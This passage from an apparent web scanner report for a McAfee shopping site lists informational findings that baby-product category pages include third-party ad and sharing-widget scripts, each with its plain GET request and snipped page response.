<title>View Toilet Training at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.85. http://secureshopping.mcafee.com/browse/baby/safety/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/safety/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:35 GMT
Content-Length: 53684

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Safety at McAfee Secure Shopping - Search, Discover & Compar
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.86. http://secureshopping.mcafee.com/browse/baby/safety/baby-monitors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/baby-monitors/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/safety/baby-monitors/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:36 GMT
Content-Length: 66244

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby Monitors at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.87. http://secureshopping.mcafee.com/browse/baby/safety/bath-safety/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/bath-safety/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/safety/bath-safety/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:40 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:40 GMT
Content-Length: 61264

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bath Safety at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.88. http://secureshopping.mcafee.com/browse/baby/safety/door-knob-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/door-knob-covers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/safety/door-knob-covers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:42 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:42 GMT
Content-Length: 55376

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Door Knob Covers at McAfee Secure Shopping - Search, Discover &a
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.89. http://secureshopping.mcafee.com/browse/baby/safety/drawer-cabinet-locks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/drawer-cabinet-locks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/safety/drawer-cabinet-locks/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:44 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:44 GMT
Content-Length: 61652

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Drawer & Cabinet Locks at McAfee Secure Shopping - Search, D
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.90. http://secureshopping.mcafee.com/browse/baby/safety/night-lights/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/night-lights/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/safety/night-lights/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:45 GMT
Content-Length: 55670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Night Lights at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.91. http://secureshopping.mcafee.com/browse/baby/safety/outlet-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/outlet-covers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/safety/outlet-covers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:46 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:46 GMT
Content-Length: 48765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Outlet Covers at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.92. http://secureshopping.mcafee.com/browse/baby/safety/safety-gates/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/safety-gates/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/safety/safety-gates/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:46 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:46 GMT
Content-Length: 65361

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Safety Gates at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.93. http://secureshopping.mcafee.com/browse/baby/safety/safety-kits/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/safety-kits/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/safety/safety-kits/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:48 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:48 GMT
Content-Length: 53520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Safety Kits at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.94. http://secureshopping.mcafee.com/browse/baby/toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/toys/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
